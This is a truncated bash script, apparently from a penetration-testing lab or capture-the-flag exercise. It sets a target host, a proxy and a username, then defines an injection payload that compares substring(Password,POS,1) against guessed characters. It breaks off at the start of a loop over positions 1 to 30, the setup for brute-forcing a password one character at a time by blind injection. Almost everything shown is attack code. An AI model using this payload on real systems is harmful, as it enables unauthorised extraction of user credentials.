#!/bin/bash HOST=172.31.179.1 PROXY=10.10.10.200:3128 USER=$1 PASS="" PAYLOAD="\'or substring(Password,POS,1)=\'BRUTE" for pos in $(seq 1 30); do